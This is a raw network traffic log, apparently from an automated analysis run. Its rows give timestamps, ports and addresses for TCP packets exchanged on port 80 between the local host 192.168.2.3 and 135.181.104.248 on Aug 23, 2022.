Aug 23, 2022 03:43:00.682504892 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682540894 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682837009 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682905912 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682926893 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683001995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683077097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683120966 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683161974 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683163881 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683202982 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683204889 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683243990 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683247089 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683284998 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683326006 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683396101 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683406115 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683425903 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683432102 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683440924 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683460951 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683480024 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683481932 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683521032 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683523893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683564901 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683604956 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683618069 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.683646917 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.683703899 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.685451031 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.685498953 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.685547113 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.685574055 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.685750961 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.685791969 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.685834885 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.685877085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.685957909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.685982943 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.685997009 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.685997963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686003923 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686038971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686077118 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686113119 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686115980 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686151028 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686156034 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686157942 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686177969 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686182976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686209917 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686220884 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686249971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686280966 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686290026 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686311960 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686331034 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686342955 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686372995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686378956 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686413050 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686423063 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686454058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686470985 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686511993 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686517000 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686562061 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686574936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686634064 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686640024 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686688900 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686717033 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686762094 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686768055 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686803102 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686820030 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686858892 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686877012 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686904907 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686908960 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686947107 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.686954021 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.686991930 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687027931 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687043905 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687076092 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687088013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687093019 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687129974 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687135935 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687177896 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687231064 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687232018 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687273026 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687313080 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687330961 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687371969 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687414885 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687458992 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687499046 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687531948 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687542915 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687577009 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687586069 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687608004 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687625885 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687638044 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687666893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687706947 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687716961 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687730074 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687747955 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687763929 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687791109 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687829971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687835932 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687864065 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687871933 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.687891006 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.687918901 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688170910 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688210964 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688251019 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688282967 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688292980 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688293934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688309908 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688333035 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688365936 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688373089 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688375950 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688414097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688452959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688477993 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688498020 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688575983 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688616991 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688657045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688695908 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688697100 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688735962 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688741922 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688752890 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688776970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688817024 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688855886 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688865900 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688875914 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688901901 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688941002 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688971043 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.688981056 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.688987017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689022064 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689060926 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689091921 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689106941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689110994 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689151049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689188957 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689215899 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689228058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689259052 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689269066 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689292908 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689311028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689316034 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689352989 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689367056 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689390898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689399004 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689430952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689445019 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689471960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689497948 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689513922 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689555883 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689594030 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689594984 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689615965 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689635038 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689641953 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689677954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689690113 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689717054 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689758062 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689781904 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689796925 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689815998 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689836979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689877033 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689888954 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.689917088 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689959049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.689975023 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690011024 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690021992 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690033913 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690057993 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690080881 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690102100 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690109015 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690124035 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690141916 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690148115 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690156937 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690171957 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690191984 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690196037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690206051 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690220118 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690224886 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690244913 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690262079 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690268040 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690275908 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690291882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690316916 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690325022 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690359116 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690383911 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690387011 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690437078 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690454960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690510035 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690562010 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690577984 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690644026 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690665960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690705061 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690732002 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690754890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690773964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690777063 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690788031 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690820932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690830946 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690845013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690885067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690896988 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690923929 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690948963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690968990 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.690970898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.690996885 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.691009045 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.691014051 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.691036940 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.691060066 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.691066980 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.691085100 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.691133022 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.691181898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.691205978 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.691226959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.691236019 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.691248894 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.691251040 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.691266060 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.691277981 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.691320896 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720154047 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720208883 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720226049 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720252037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720308065 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720313072 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720437050 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720478058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720489979 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720523119 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720525980 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720563889 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720565081 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720604897 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720607042 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720644951 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720653057 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720685005 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720685959 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720726013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720731974 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720767975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720792055 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720807076 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720808983 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720849037 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720850945 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720890045 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720894098 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720932961 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.720935106 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720972061 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.720972061 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721009970 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721012115 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721050024 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721052885 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721092939 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721093893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721133947 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721133947 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721173048 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721211910 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721220970 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721250057 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721256018 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721290112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721291065 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721328020 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721329927 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721369028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721370935 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721406937 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721410036 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721446991 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721448898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721487999 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721488953 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721564054 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721606016 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721607924 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721643925 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721683025 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721685886 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721723080 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721724033 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721792936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.721837997 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.721859932 CEST	80	49812	135.181.104.248	192.168.2.3
